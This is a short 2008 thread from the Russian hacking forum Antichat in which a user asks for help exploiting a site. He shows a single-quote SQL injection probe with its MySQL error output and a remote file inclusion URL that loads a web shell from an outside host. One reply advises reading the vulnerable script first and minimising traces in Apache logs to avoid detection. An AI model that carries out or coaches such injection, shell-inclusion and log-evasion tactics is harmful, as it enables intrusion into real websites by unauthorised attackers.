Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   SQL или просто недоработки (https://forum.antichat.xyz/showthread.php?t=97437)

Ilia_dozor 22.12.2008 12:53
SQL или просто недоработки
 
Нашел этот сайт смотри тута потом сделал вот http://наш сайт.com/?show=item&item=%D1%8D&cur=' и видим

Query Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

видать,дело пахнет керосином...а вот если сделать http://этот сайт.com/?load=http://ваш шелл то вообще весело

помогите довести sql до конца

TAKO 22.12.2008 13:00
Обычная ошибка. Не уязвимость

furang 22.12.2008 13:55
если есть возможность заинклудить шелл, то зачем мудохатся с инъекцией?
А если так уж охота провести инъекцию, то я в твоем случае для начала сливаю сам скрипт в котором потенциальная бага, ищу есть ли там ошибка, и только потом организовую атаку. На апаче ведь логи ведутся, и чем меньше наследишь тем больше вероятность остаться незамеченным.

ЗЫ. Кстати даже если ты можешь влиять на запрос, то не всегда есть возможность напакостить. Порой стоят оч неплохе фильтры.

Ilia_dozor 22.12.2008 18:00
ну как вам сказать-шелл не коннектится...нинай пачму


Время: 19:34